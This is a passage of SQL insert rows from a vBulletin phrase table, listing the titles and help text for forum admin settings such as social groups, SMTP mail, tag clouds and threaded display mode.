(39368, -1, 'setting_sg_enable_owner_only_discussions_desc', 'vbsettings', 'Allows users to create Groups where only they can create new discussions.', 'vbulletin', 'vBulletin Solutions', 1218193438, '3.8.0 Alpha 1'),
(39369, -1, 'setting_sg_enable_owner_only_discussions_title', 'vbsettings', 'Allow Group Owners to Limit New Discussions to Themselves', 'vbulletin', 'vBulletin Solutions', 1218193438, '3.8.0 Alpha 1'),
(39370, -1, 'setting_sg_enablesocialgroupicons_desc', 'vbsettings', 'If this is enabled users who create groups will be able to upload a group icon that will be displayed when viewing the group, and as a smaller version when viewing group listings. \r\n \r\nNote: Social Group Image Icons are always limited to 200px by 200px.', 'vbulletin', 'vBulletin Solutions', 1218193505, '3.8.0 Alpha 1'),
(39371, -1, 'setting_sg_enablesocialgroupicons_title', 'vbsettings', 'Enable Social Group Image Icons', 'vbulletin', 'vBulletin Solutions', 1218193505, '3.8.0 Alpha 1'),
(39372, -1, 'setting_sg_maxdescriptionchars_desc', 'vbsettings', 'Maximum characters to allow in the description of a new social group. \r\n \r\nSet this to 0 for no limit.', 'vbulletin', 'vBulletin Solutions', 1218193791, '3.8.0 Alpha 1'),
(39373, -1, 'setting_sg_maxdescriptionchars_title', 'vbsettings', 'Maximum Characters in Group Descriptions', 'vbulletin', 'vBulletin Solutions', 1218193791, '3.8.0 Alpha 1'),
(39374, -1, 'setting_sg_maxperpage_desc', 'vbsettings', 'This setting allows you to limit the number of groups users may display per page when listing social groups. \r\n \r\nNote: This number must be at least 1.', 'vbulletin', 'vBulletin Solutions', 1218193331, '3.8.0 Alpha 1'),
(39375, -1, 'setting_sg_maxperpage_title', 'vbsettings', 'Maximum Groups Per-Page', 'vbulletin', 'vBulletin Solutions', 1218193331, '3.8.0 Alpha 1'),
(39376, -1, 'setting_sg_name_maxchars_desc', 'vbsettings', 'Enter the maximum number of characters allowed in social group names. Names longer than this limit will be rejected.', 'vbulletin', 'vBulletin Solutions', 1205244265, '3.7.0 Release Candidate 1'),
(39377, -1, 'setting_sg_name_maxchars_title', 'vbsettings', 'Social Group Name Maximum Length', 'vbulletin', 'vBulletin Solutions', 1205244265, '3.7.0 Release Candidate 1'),
(39378, -1, 'setting_sg_newgroups_count_desc', 'vbsettings', 'This setting allows you to define the number of groups displayed in the Newest Groups section of the Social Groups Overview. \r\n \r\nNote: This number must be at least 1.', 'vbulletin', 'vBulletin Solutions', 1218193519, '3.8.0 Alpha 1'),
(39379, -1, 'setting_sg_newgroups_count_title', 'vbsettings', 'Number of Newest Groups to Display', 'vbulletin', 'vBulletin Solutions', 1218193519, '3.8.0 Alpha 1'),
(39380, -1, 'setting_sg_perpage_desc', 'vbsettings', 'This setting allows you to define the default number of groups displayed per-page when searching social groups. \r\n \r\nNote: This number must be at least 1.', 'vbulletin', 'vBulletin Solutions', 1218193319, '3.8.0 Alpha 1'),
(39381, -1, 'setting_sg_perpage_title', 'vbsettings', 'Default Groups Per-Page', 'vbulletin', 'vBulletin Solutions', 1218193319, '3.8.0 Alpha 1'),
(39382, -1, 'setting_sgd_maxperpage_desc', 'vbsettings', 'This setting allows you to limit the number of discussions users may display per page in a social group. \r\n \r\nNote: This number must be at least 1.', 'vbulletin', 'vBulletin Solutions', 1218193389, '3.8.0 Alpha 1'),
(39383, -1, 'setting_sgd_maxperpage_title', 'vbsettings', 'Maximum Discussions Per-Page', 'vbulletin', 'vBulletin Solutions', 1218193389, '3.8.0 Alpha 1'),
(39384, -1, 'setting_sgd_perpage_desc', 'vbsettings', 'This setting allows you to define the default number of discussions displayed per-page in a social group. \r\n \r\nNote: This number must be at least 1.', 'vbulletin', 'vBulletin Solutions', 1218193360, '3.8.0 Alpha 1'),
(39385, -1, 'setting_sgd_perpage_title', 'vbsettings', 'Default Discussions Per-Page', 'vbulletin', 'vBulletin Solutions', 1218193360, '3.8.0 Alpha 1'),
(39386, -1, 'setting_showbirthdays_desc', 'vbsettings', 'Displays today\'s birthdays for those usergroups that have birthday display enabled (see User Groups ->Usergroup Manager ).', 'vbulletin', '', 0, ''),
(39387, -1, 'setting_showbirthdays_title', 'vbsettings', 'Display Today\'s Birthdays?', 'vbulletin', '', 0, ''),
(39388, -1, 'setting_showdeficon_desc', 'vbsettings', 'If you would like to use a default icon for messages without an icon, enter the path to the image here.', 'vbulletin', '', 0, ''),
(39389, -1, 'setting_showdeficon_title', 'vbsettings', 'Show Default Post Icon', 'vbulletin', '', 0, ''),
(39390, -1, 'setting_showdots_desc', 'vbsettings', 'When this feature is enabled, a logged in user will see an \'arrow\' (or whatever graphic you choose) on the folder icons (hot folders, new folders, etc.) next to the threads that they have posted in.', 'vbulletin', '', 0, ''),
(39391, -1, 'setting_showdots_title', 'vbsettings', 'Highlight Threads in Which User Has Posted', 'vbulletin', '', 0, ''),
(39392, -1, 'setting_showevents_desc', 'vbsettings', 'Choose the number of upcoming days that you wish to display upcoming events from. \r\n\r\nSet to 0 to disable upcoming events.', 'vbulletin', 'vBulletin Solutions', 1199365719, '3.7.0 Beta 4'),
(39393, -1, 'setting_showevents_title', 'vbsettings', 'Display Calendar Events?', 'vbulletin', 'vBulletin Solutions', 1199365719, '3.7.0 Beta 4'),
(39394, -1, 'setting_showeventtype_desc', 'vbsettings', 'Choose the method by which you wish to display the upcoming events if the \"Display Calendar Events\" option is enabled.', 'vbulletin', '', 0, ''),
(39395, -1, 'setting_showeventtype_title', 'vbsettings', 'Upcoming Event Type', 'vbulletin', '', 0, ''),
(39396, -1, 'setting_showforumdescription_desc', 'vbsettings', 'Show forum descriptions below forum titles in forum listings?', 'vbulletin', '', 0, ''),
(39397, -1, 'setting_showforumdescription_title', 'vbsettings', 'Show Forum Descriptions in Forum Listings', 'vbulletin', '', 0, ''),
(39398, -1, 'setting_showforumusers_desc', 'vbsettings', 'Enabling this option will show the current users browsing a particular forum on forumdisplay.php while adding one query. This can have an effect on performance. The Alphabetical option requires more resources than the random option.', 'vbulletin', 'vBulletin Solutions', 1145485143, '3.6.0 Beta 1'),
(39399, -1, 'setting_showforumusers_title', 'vbsettings', 'Show Users Browsing Forums', 'vbulletin', 'vBulletin Solutions', 1145485143, '3.6.0 Beta 1'),
(39400, -1, 'setting_showholidays_desc', 'vbsettings', 'Display upcoming custom holidays in the above events list?', 'vbulletin', '', 0, ''),
(39401, -1, 'setting_showholidays_title', 'vbsettings', 'Display Custom Holidays', 'vbulletin', '', 0, ''),
(39402, -1, 'setting_showimicons_desc', 'vbsettings', 'Setting this option to yes will show the images for Skype, ICQ, AIM, MSN, and Yahoo! Messenger if the user has entered the correct information in his/her profile. These links are shown in various places throughout the forum, on posts, who\'s online, memberlist, profile, etc.', 'vbulletin', '', 0, ''),
(39403, -1, 'setting_showimicons_title', 'vbsettings', 'Show Instant Messaging Program Icons', 'vbulletin', '', 0, ''),
(39404, -1, 'setting_showlocks_desc', 'vbsettings', 'Do you wish to have the new post indicators shown on the index page (on.gif and off.gif) be shown with locks to guests and other members who have no permission to post?', 'vbulletin', '', 0, ''),
(39405, -1, 'setting_showlocks_title', 'vbsettings', 'Show Lock Icons to Users', 'vbulletin', '', 0, ''),
(39406, -1, 'setting_showmoderatorcolumn_desc', 'vbsettings', 'Turns the moderator column on and off for forumhome, forumdisplay and usercp.', 'vbulletin', '', 0, ''),
(39407, -1, 'setting_showmoderatorcolumn_title', 'vbsettings', 'Show Moderator Column', 'vbulletin', '', 0, ''),
(39408, -1, 'setting_showprefixlastpost_desc', 'vbsettings', 'You may choose to show a thread\'s prefix in the last post column, along with the title. This will increase the size of the data included in that column, however.', 'vbulletin', 'vBulletin Solutions', 1190112951, '3.7.0 Beta 1'),
(39409, -1, 'setting_showprefixlastpost_title', 'vbsettings', 'Show Thread Prefix in Last Post Column?', 'vbulletin', 'vBulletin Solutions', 1190112951, '3.7.0 Beta 1'),
(39410, -1, 'setting_showprivateforums_desc', 'vbsettings', 'Select \'No\' here will hide private forums from users who are not allowed to access them. Users who do have permission to access them will have to log in before they can see these forums too. \r\n \r\nThis option applies to any forum listing, including the Forum Jump menu, and Search Results.', 'vbulletin', 'vBulletin Solutions', 1194862926, '3.7.0 Beta 1'),
(39411, -1, 'setting_showprivateforums_title', 'vbsettings', 'Show Private Forums', 'vbulletin', '', 0, ''),
(39412, -1, 'setting_showsimilarthreads_desc', 'vbsettings', 'Set this value to \'Yes\' if you would like to see \'similar threads\' displayed on the show thread page. \r\n \r\nPlease note that this setting will only work if you have \'Automatic Similar Thread Search\' enabled in the message searching options section.', 'vbulletin', '', 0, ''),
(39413, -1, 'setting_showsimilarthreads_title', 'vbsettings', 'Show Similar Threads?', 'vbulletin', '', 0, ''),
(39414, -1, 'setting_showstickies_desc', 'vbsettings', 'Select \'Yes\' to show sticky threads on every forumdisplay.php page, regardless of page number. Set \'No\' to only display them on page one.', 'vbulletin', '', 0, ''),
(39415, -1, 'setting_showstickies_title', 'vbsettings', 'Show Sticky Threads on All Pages', 'vbulletin', '', 0, ''),
(39416, -1, 'setting_showthreadusers_desc', 'vbsettings', 'Enabling this option will show the current users browsing a particular thread on showthread.php while adding one query. This can have an effect on performance. The Alphabetical option requires more resources than the Random option.', 'vbulletin', 'vBulletin Solutions', 1145485155, '3.6.0 Beta 1'),
(39417, -1, 'setting_showthreadusers_title', 'vbsettings', 'Show Users Browsing Threads', 'vbulletin', 'vBulletin Solutions', 1145485155, '3.6.0 Beta 1'),
(39418, -1, 'setting_showuserrates_desc', 'vbsettings', 'Controls how many ratings to display in the user\'s control panel.', 'vbulletin', 'vBulletin Solutions', 1199365375, '3.7.0 Beta 4'),
(39419, -1, 'setting_showuserrates_title', 'vbsettings', 'Number of Reputation Ratings to Display', 'vbulletin', 'vBulletin Solutions', 1199365375, '3.7.0 Beta 4'),
(39420, -1, 'setting_showvotes_desc', 'vbsettings', 'This option specifies the number of thread rating votes that must be cast of a particular thread before the current rating is displayed on forumdisplay.php and showthread.php.', 'vbulletin', 'vBulletin Solutions', 1199365638, '3.7.0 Beta 4'),
(39421, -1, 'setting_showvotes_title', 'vbsettings', 'Required Thread Rating Votes to Show Rating', 'vbulletin', 'vBulletin Solutions', 1199365638, '3.7.0 Beta 4'),
(39422, -1, 'setting_sigpicpath_desc', 'vbsettings', 'Leave this setting alone.', 'vbulletin', 'vBulletin Solutions', 1159279059, '3.6.2'),
(39423, -1, 'setting_sigpicpath_title', 'vbsettings', 'Signature Picture Path', 'vbulletin', 'vBulletin Solutions', 1159279059, '3.6.2'),
(39424, -1, 'setting_sigpicurl_desc', 'vbsettings', 'Leave this setting alone.', 'vbulletin', 'vBulletin Solutions', 1159279066, '3.6.2'),
(39425, -1, 'setting_sigpicurl_title', 'vbsettings', 'Signature Pic URL', 'vbulletin', 'vBulletin Solutions', 1159279066, '3.6.2'),
(39426, -1, 'setting_similarthreadsearch_desc', 'vbsettings', 'Setting this option will cause a search for similar threads to be automatically done when a new thread is posted. These similar threads are then linked to from the newly posted thread\'s page. This can have an effect on performance. ', 'vbulletin', '', 0, ''),
(39427, -1, 'setting_similarthreadsearch_title', 'vbsettings', 'Automatic Similar Thread Search', 'vbulletin', '', 0, ''),
(39428, -1, 'setting_similarthreadthreshold_desc', 'vbsettings', 'For a post to be matched in a search for similar threads, it must have a score of this number or greater, per searchable word. For more information on how post scores are determined, see the Search Algorithms section.', 'vbulletin', '', 0, ''),
(39429, -1, 'setting_similarthreadthreshold_title', 'vbsettings', 'Similar Threads Relevance Threshold', 'vbulletin', '', 0, ''),
(39430, -1, 'setting_skypeweb_gfx_desc', 'vbsettings', 'If set to \'Yes\', load Skype™ icon from the SkypeWeb server in order to show users\' online status, otherwise use local (static) graphic. \r\n \r\nIf set to \'Language Specific\', graphics in the language being used by the visiting user will be loaded. \r\n \r\nIf the \'Language Specific\' option does not work, switch it off and try again in a few weeks.', 'vbulletin', '', 0, ''),
(39431, -1, 'setting_skypeweb_gfx_title', 'vbsettings', 'Use SkypeWeb Graphics', 'vbulletin', '', 0, ''),
(39432, -1, 'setting_smcolumns_desc', 'vbsettings', 'If the smiliebox is enabled, how many smilies should be shown per row of the box?', 'vbulletin', 'vBulletin Solutions', 1199365511, '3.7.0 Beta 4'),
(39433, -1, 'setting_smcolumns_title', 'vbsettings', 'Smiliebox Smilies Per Row', 'vbulletin', 'vBulletin Solutions', 1199365511, '3.7.0 Beta 4'),
(39434, -1, 'setting_smtotal_desc', 'vbsettings', 'How many smilies should be displayed in the smiliebox before the user is prompted to click for the more smilies popup window? \r\n \r\nSet this value to 0 if you would like to hide the clickable smiliebox completely.', 'vbulletin', 'vBulletin Solutions', 1199365505, '3.7.0 Beta 4'),
(39435, -1, 'setting_smtotal_title', 'vbsettings', 'Smiliebox Total Smilies', 'vbulletin', 'vBulletin Solutions', 1199365505, '3.7.0 Beta 4'),
(39436, -1, 'setting_smtp_host_desc', 'vbsettings', 'If you\'ve enabled SMTP mail, please specify the host here. You may find that specifying an IP Address rather than a domain name, results in better performance. Example: smtp.gmail.com', 'vbulletin', '', 0, ''),
(39437, -1, 'setting_smtp_host_title', 'vbsettings', 'SMTP Host', 'vbulletin', '', 0, ''),
(39438, -1, 'setting_smtp_pass_desc', 'vbsettings', 'If you\'ve enabled SMTP mail and your server requires authentication, please specify your password here.', 'vbulletin', '', 0, ''),
(39439, -1, 'setting_smtp_pass_title', 'vbsettings', 'SMTP Password', 'vbulletin', '', 0, ''),
(39440, -1, 'setting_smtp_port_desc', 'vbsettings', 'If you\'ve enabled SMTP mail, please specify the port here.', 'vbulletin', 'vBulletin Solutions', 1199365195, '3.7.0 Beta 4'),
(39441, -1, 'setting_smtp_port_title', 'vbsettings', 'SMTP Port', 'vbulletin', 'vBulletin Solutions', 1199365195, '3.7.0 Beta 4'),
(39442, -1, 'setting_smtp_tls_desc', 'vbsettings', 'If you\'ve enabled SMTP mail and your server requires a secure connection, please set the appropriate setting. This requires OpenSSL support to be compiled into PHP.', 'vbulletin', 'vBulletin Solutions', 1229523320, '3.8.0 Release Candidate 2'),
(39443, -1, 'setting_smtp_tls_title', 'vbsettings', 'SMTP Secure Connection', 'vbulletin', 'vBulletin Solutions', 1229523320, '3.8.0 Release Candidate 2'),
(39444, -1, 'setting_smtp_user_desc', 'vbsettings', 'If you\'ve enabled SMTP mail and your server requires authentication, please specify your username here.', 'vbulletin', '', 0, ''),
(39445, -1, 'setting_smtp_user_title', 'vbsettings', 'SMTP Username', 'vbulletin', '', 0, ''),
(39446, -1, 'setting_social_moderation_desc', 'vbsettings', 'When enabled, all new group messages are placed into moderation. This can also be enabled in usergroup permissions.', 'vbulletin', 'vBulletin Solutions', 1205244265, '3.7.0 Release Candidate 1'),
(39447, -1, 'setting_social_moderation_title', 'vbsettings', 'Social Group Message Moderation', 'vbulletin', 'vBulletin Solutions', 1205244265, '3.7.0 Release Candidate 1'),
(39448, -1, 'setting_socialbookmarks_desc', 'vbsettings', 'Use this switch to quickly disable the display of the bookmarks section of the page, on which links to social bookmarking sites (set up through the Social Bookmarking Manager ) are shown. \r\n \r\nSocial bookmarking links will only be displayed in guest-viewable threads.', 'vbulletin', 'vBulletin Solutions', 1205756290, '3.7.0 Release Candidate 1'),
(39449, -1, 'setting_socialbookmarks_title', 'vbsettings', 'Enable Social Bookmarking', 'vbulletin', 'vBulletin Solutions', 1205756290, '3.7.0 Release Candidate 1'),
(39450, -1, 'setting_socnet_desc', 'vbsettings', 'Use this option to globally enable or disable various user profile-related features. Additional options are available for each feature in their respective sections.', 'vbulletin', 'vBulletin Solutions', 1205244460, '3.7.0 Release Candidate 1'),
(39451, -1, 'setting_socnet_groups_albums_enabled_desc', 'vbsettings', 'If this option is selected, any users with albums will be able to add pictures from an album to groups they belong to.', 'vbulletin', 'vBulletin Solutions', 1218193414, '3.8.0 Alpha 1'),
(39452, -1, 'setting_socnet_groups_albums_enabled_title', 'vbsettings', 'Enable Social Group Pictures', 'vbulletin', 'vBulletin Solutions', 1218193414, '3.8.0 Alpha 1'),
(39453, -1, 'setting_socnet_groups_msg_enabled_desc', 'vbsettings', 'If you select this options, members of each group will be able to post messages in the group. Users who are not part of the group will still be able to read the messages.', 'vbulletin', 'vBulletin Solutions', 1205244265, '3.7.0 Release Candidate 1'),
(39454, -1, 'setting_socnet_groups_msg_enabled_title', 'vbsettings', 'Enable Social Group Messages', 'vbulletin', 'vBulletin Solutions', 1205244265, '3.7.0 Release Candidate 1'),
(39455, -1, 'setting_socnet_title', 'vbsettings', 'Enabled User Profile Features', 'vbulletin', 'vBulletin Solutions', 1205244460, '3.7.0 Release Candidate 1'),
(39456, -1, 'setting_softlinebreakchars_desc', 'vbsettings', 'When counting the number of lines in a signature, this setting controls the number of characters that can be displayed before text wraps in the browser and is displayed as multiple lines. Once this value is surpassed, the run of text will be counted as multiple lines. \r\n \r\nThe value in this setting should be based on the number of normal-sized characters. Other sized characters will be scaled appropriately to this setting.', 'vbulletin', 'vBulletin Solutions', 1196462721, '3.7.0 Beta 1'),
(39457, -1, 'setting_softlinebreakchars_title', 'vbsettings', 'Signature Soft-Linebreak Character Limit', 'vbulletin', 'vBulletin Solutions', 1196462721, '3.7.0 Beta 1'),
(39458, -1, 'setting_stopshouting_desc', 'vbsettings', 'Prevent your users \'shouting\' in their thread titles/message text by changing all-uppercase titles with at least this many characters to capitalization only on the first letters of some words. \r\n \r\nSet the value to 0 to disable this function. \r\n \r\nDisable this for some international forums with different character sets, as this may cause problems.', 'vbulletin', 'vBulletin Solutions', 1199365466, '3.7.0 Beta 4'),
(39459, -1, 'setting_stopshouting_title', 'vbsettings', 'Prevent \'SHOUTING\'', 'vbulletin', 'vBulletin Solutions', 1199365466, '3.7.0 Beta 4'),
(39460, -1, 'setting_storecssasfile_desc', 'vbsettings', 'If you would like to store the CSS stylesheet for each style as a file, you must ensure that you have a directory called \'vbulletin_css\' inside the \'clientscript\' folder, and that the web server has permission to write and delete files within that directory.', 'vbulletin', '', 0, ''),
(39461, -1, 'setting_storecssasfile_title', 'vbsettings', 'Store CSS Stylesheets as Files?', 'vbulletin', '', 0, ''),
(39462, -1, 'setting_styleid_desc', 'vbsettings', 'Select the default style for your forums. This style will be used for all guests, and any members who have not expressed a style preference in their options, or are attempting to use a style that does not exist or is forbidden.', 'vbulletin', 'vBulletin Solutions', 1156857943, '3.6.1'),
(39463, -1, 'setting_styleid_title', 'vbsettings', 'Default Style', 'vbulletin', 'vBulletin Solutions', 1156857943, '3.6.1'),
(39464, -1, 'setting_subforumdepth_desc', 'vbsettings', 'If you have forums below the depth specified in the \'Depth of Forums\' settings above, you can display them as sub-forum links in each forum\'s display area. \r\n \r\nSet this value to 0 if you want to display no sub-forums.', 'vbulletin', 'vBulletin Solutions', 1199365745, '3.7.0 Beta 4'),
(39465, -1, 'setting_subforumdepth_title', 'vbsettings', 'Depth of Sub-Forums', 'vbulletin', 'vBulletin Solutions', 1199365745, '3.7.0 Beta 4'),
(39466, -1, 'setting_subscriptionmethods_desc', 'vbsettings', 'Payment APIs are enabled', 'vbulletin', 'vBulletin Solutions', 1148682947, '3.6.0 Beta 1'),
(39467, -1, 'setting_subscriptionmethods_title', 'vbsettings', 'Active Payment APIs', 'vbulletin', 'vBulletin Solutions', 1148682947, '3.6.0 Beta 1'),
(39468, -1, 'setting_tagbadwords_desc', 'vbsettings', 'These words will be checked in addition to those listed in includes/searchwords.php to form a list of words whose use is banned in tagging. \r\n \r\nSeparate each word with a space or carriage return. \r\n \r\nThis will not affect existing tags. You will need to delete those tags via the tag manager .', 'vbulletin', 'vBulletin Solutions', 1229429818, '3.8.0 Release Candidate 2'),
(39469, -1, 'setting_tagbadwords_title', 'vbsettings', 'Thread Tag Banned Words', 'vbulletin', 'vBulletin Solutions', 1229429818, '3.8.0 Release Candidate 2'),
(39470, -1, 'setting_tagcloud_cachetime_desc', 'vbsettings', 'Amount of time in minutes before the tag cloud data cache is regenerated. \r\n \r\nA value of 0 will generate the tag cloud on each view.', 'vbulletin', 'vBulletin Solutions', 1206528510, '3.7.0 Release Candidate 2'),
(39471, -1, 'setting_tagcloud_cachetime_title', 'vbsettings', 'Tag Cloud: Cache Time', 'vbulletin', 'vBulletin Solutions', 1206528510, '3.7.0 Release Candidate 2'),
(39472, -1, 'setting_tagcloud_levels_desc', 'vbsettings', 'The number of levels to be shown in the tag cloud. \r\n \r\nBy default, there are 5 levels named level1 to level5, with the font size growing from its smallest size at level 1 to its largest at level 5. \r\n \r\nIncreasing this value above 5 requires a template change.', 'vbulletin', 'vBulletin Solutions', 1206528487, '3.7.0 Release Candidate 2'),
(39473, -1, 'setting_tagcloud_levels_title', 'vbsettings', 'Tag Cloud: Number of Levels', 'vbulletin', 'vBulletin Solutions', 1206528487, '3.7.0 Release Candidate 2'),
(39474, -1, 'setting_tagcloud_searchcloud_desc', 'vbsettings', 'This option controls whether a tag cloud relating to the frequency of tag searches is shown at the bottom of the advanced search. \r\n \r\nA usage-based tag cloud is always shown here .', 'vbulletin', 'vBulletin Solutions', 1206527947, '3.7.0 Release Candidate 2'),
(39475, -1, 'setting_tagcloud_searchcloud_title', 'vbsettings', 'Enable Search Tag Cloud', 'vbulletin', 'vBulletin Solutions', 1206527947, '3.7.0 Release Candidate 2'),
(39476, -1, 'setting_tagcloud_searchhistory_desc', 'vbsettings', 'Amount of days that the system will keep a record of tag searches for use in the search tag cloud. \r\n \r\n0 means to use all data available.', 'vbulletin', 'vBulletin Solutions', 1206528120, '3.7.0 Release Candidate 2'),
(39477, -1, 'setting_tagcloud_searchhistory_title', 'vbsettings', 'Search Tag Cloud: History (Days)', 'vbulletin', 'vBulletin Solutions', 1206528120, '3.7.0 Release Candidate 2'),
(39478, -1, 'setting_tagcloud_tags_desc', 'vbsettings', 'The maximum number of tags to display in the tag cloud.', 'vbulletin', 'vBulletin Solutions', 1206528470, '3.7.0 Release Candidate 2'),
(39479, -1, 'setting_tagcloud_tags_title', 'vbsettings', 'Tag Cloud: Number of Tags', 'vbulletin', 'vBulletin Solutions', 1206528470, '3.7.0 Release Candidate 2'),
(39480, -1, 'setting_tagcloud_usagehistory_desc', 'vbsettings', 'The number of days worth of data that should be used to generate the usage-based tag cloud here . \r\n \r\nTags added more than this many days ago will not change the size of the link in the cloud.', 'vbulletin', 'vBulletin Solutions', 1206528724, '3.7.0 Release Candidate 2'),
(39481, -1, 'setting_tagcloud_usagehistory_title', 'vbsettings', 'Tag Cloud: Usage History (Days)', 'vbulletin', 'vBulletin Solutions', 1206528724, '3.7.0 Release Candidate 2'),
(39482, -1, 'setting_tagcloud_usergroup_desc', 'vbsettings', 'The tag cloud pulls together data from threads in many forums. Users may not be able to see all the threads that make up the tag cloud results. With this option, you can force the tag cloud to be built as if it were viewed by a particular usergroup. \r\n \r\nLive permission checking is the most accurate, but disables the above specified caching.', 'vbulletin', 'vBulletin Solutions', 1209744349, '3.7.1'),
(39483, -1, 'setting_tagcloud_usergroup_title', 'vbsettings', 'Tag Cloud: Build Usergroup', 'vbulletin', 'vBulletin Solutions', 1209744349, '3.7.1'),
(39484, -1, 'setting_tagdelimiter_desc', 'vbsettings', 'This option allows you to specify additional tag separators. Regardless of the value here, a comma will always be used as a separator. \r\n \r\nSeparate each tag separators with a space. If you would like to use a space in a tag separator, click the \'?\' for information on the advanced separator syntax. ', 'vbulletin', 'vBulletin Solutions', 1218107556, '3.8.0 Alpha 1'),
(39485, -1, 'setting_tagdelimiter_title', 'vbsettings', 'Tag Separators', 'vbulletin', 'vBulletin Solutions', 1211457688, '3.7.1'),
(39486, -1, 'setting_tagforcelower_desc', 'vbsettings', 'If you enable this option, \"A\" through \"Z\" will be replaced with \"a\" through \"z\" in tag names. Other characters will not be changed.', 'vbulletin', 'vBulletin Solutions', 1196440365, '3.7.0 Beta 1'),
(39487, -1, 'setting_tagforcelower_title', 'vbsettings', 'Force Tags to be Lower Case', 'vbulletin', 'vBulletin Solutions', 1196440365, '3.7.0 Beta 1'),
(39488, -1, 'setting_taggoodwords_desc', 'vbsettings', 'Words entered here will be allowed as tags, regardless of whether or not their use would be otherwise disallowed due to length, censorship, commonality etc. \r\n \r\nIf a word is specified in the \'Banned\' words group and here, it will be allowed. \r\n \r\nSeparate each word with a space or carriage return.', 'vbulletin', 'vBulletin Solutions', 1211890083, '3.7.1'),
(39489, -1, 'setting_taggoodwords_title', 'vbsettings', 'Thread Tag Allowed Words', 'vbulletin', 'vBulletin Solutions', 1211890083, '3.7.1'),
(39490, -1, 'setting_tagmaxlen_desc', 'vbsettings', 'The maximum number of characters in a tag name. This can be between 0 and 100.', 'vbulletin', 'vBulletin Solutions', 1196439769, '3.7.0 Beta 1'),
(39491, -1, 'setting_tagmaxlen_title', 'vbsettings', 'Tag Maximum Length', 'vbulletin', 'vBulletin Solutions', 1196439769, '3.7.0 Beta 1'),
(39492, -1, 'setting_tagmaxstarter_desc', 'vbsettings', 'The maximum number of tags the thread starter can apply. Even if this setting allows it, the number of tags in a thread cannot exceed the \"Maximum Tags per Thread\" setting. \r\n \r\n0 disables this limit. To prevent a user from tagging a thread, use user group permissions.', 'vbulletin', 'vBulletin Solutions', 1196440140, '3.7.0 Beta 1'),
(39493, -1, 'setting_tagmaxstarter_title', 'vbsettings', 'Maximum Tags Applied by Thread Starter', 'vbulletin', 'vBulletin Solutions', 1196440140, '3.7.0 Beta 1'),
(39494, -1, 'setting_tagmaxthread_desc', 'vbsettings', 'The maximum total tags per thread. No users may add more tags than this to an individual thread. \r\n \r\n0 disables this.', 'vbulletin', 'vBulletin Solutions', 1196440004, '3.7.0 Beta 1'),
(39495, -1, 'setting_tagmaxthread_title', 'vbsettings', 'Maximum Tags per Thread', 'vbulletin', 'vBulletin Solutions', 1196440004, '3.7.0 Beta 1'),
(39496, -1, 'setting_tagmaxuser_desc', 'vbsettings', 'The maximum number of tags the users other than the thread starter can apply. Even if this setting allows it, the number of tags in a thread cannot exceed the \"Maximum Tags per Thread\" setting. \r\n \r\n0 disables this limit. To prevent a user from tagging a thread, use user group permissions.', 'vbulletin', 'vBulletin Solutions', 1196440166, '3.7.0 Beta 1'),
(39497, -1, 'setting_tagmaxuser_title', 'vbsettings', 'Maximum Tags Applied by Other Users', 'vbulletin', 'vBulletin Solutions', 1196440166, '3.7.0 Beta 1'),
(39498, -1, 'setting_tagminlen_desc', 'vbsettings', 'The minimum number of characters in a tag name. This can be between 1 and 100.', 'vbulletin', 'vBulletin Solutions', 1196439966, '3.7.0 Beta 1'),
(39499, -1, 'setting_tagminlen_title', 'vbsettings', 'Tag Minimum Length', 'vbulletin', 'vBulletin Solutions', 1196439966, '3.7.0 Beta 1'),
(39500, -1, 'setting_templateversion_desc', 'vbsettings', 'Leave this setting alone.', 'vbulletin', 'vBulletin Solutions', 1229606850, '3.8.0 Release Candidate 3'),
(39501, -1, 'setting_templateversion_title', 'vbsettings', 'vBulletin Version Number', 'vbulletin', 'vBulletin Solutions', 1229606850, '3.8.0 Release Candidate 3'),
(39502, -1, 'setting_threaded_listdepth_desc', 'vbsettings', 'When in the threaded display mode, a list of posts within the current thread is displayed at the bottom of the page. This option allows you to set how \'deep\' this list displays beyond the currently selected post.', 'vbulletin', 'vBulletin Solutions', 1199365806, '3.7.0 Beta 4'),
(39503, -1, 'setting_threaded_listdepth_title', 'vbsettings', 'Threaded Mode: Posts Depth', 'vbulletin', 'vBulletin Solutions', 1199365806, '3.7.0 Beta 4'),
(39504, -1, 'setting_threaded_maxcache_desc', 'vbsettings', 'When in the threaded display mode, a list of posts within the current thread is displayed at the bottom of the page. This option allows you to set how \'deep\' into the tree of posts that vBulletin uses the Javascript \'caching\' mechanism. This makes the initial download larger, but means that the page does not have to be reloaded for every post that is viewed.', 'vbulletin', 'vBulletin Solutions', 1199365822, '3.7.0 Beta 4'),
(39505, -1, 'setting_threaded_maxcache_title', 'vbsettings', 'Threaded Mode: Maximum Cached Posts', 'vbulletin', 'vBulletin Solutions', 1199365822, '3.7.0 Beta 4'),
(39506, -1, 'setting_threaded_trimtitle_desc', 'vbsettings', 'This value will chop the title of the thread titles in the viewing pane down to a specific number of characters.\r\n\r\nA value of 0 will not trim the titles at all.', 'vbulletin', 'vBulletin Solutions', 1199365830, '3.7.0 Beta 4'),
(39507, -1, 'setting_threaded_trimtitle_title', 'vbsettings', 'Threaded Mode: Trim Titles', 'vbulletin', 'vBulletin Solutions', 1199365830, '3.7.0 Beta 4'),
(39508, -1, 'setting_threadedmode_desc', 'vbsettings', 'Set this value to \'Yes\' if you would like users (who have not explicitly set a preference) to view threads in the threaded display mode. \r\n \r\nThis setting will have no effect if \'Enable Threaded / Hybrid Mode\' is set to \'No\'.', 'vbulletin', '', 0, ''),
(39509, -1, 'setting_threadedmode_title', 'vbsettings', 'Use Threaded Mode by Default', 'vbulletin', '', 0, ''),
(39510, -1, 'setting_threadmarking_desc', 'vbsettings', 'This option controls how threads and forums are marked as read. \r\n \r\nClick the help icon on the right for more information on each option.', 'vbulletin', '', 0, ''),
(39511, -1, 'setting_threadmarking_title', 'vbsettings', 'Thread/Forum Read Marking Type', 'vbulletin', '', 0, ''),
(39512, -1, 'setting_threadpreview_desc', 'vbsettings', 'This setting allows you to specify how many characters of the first post in a thread to display in the \'title\' tag of the thread title on the forumdisplay page. \r\n \r\nSet this value to 0 to disable thread previews.', 'vbulletin', 'vBulletin Solutions', 1199365783, '3.7.0 Beta 4'),
(39513, -1, 'setting_threadpreview_title', 'vbsettings', 'Length of Thread Preview Text', 'vbulletin', 'vBulletin Solutions', 1199365783, '3.7.0 Beta 4'),
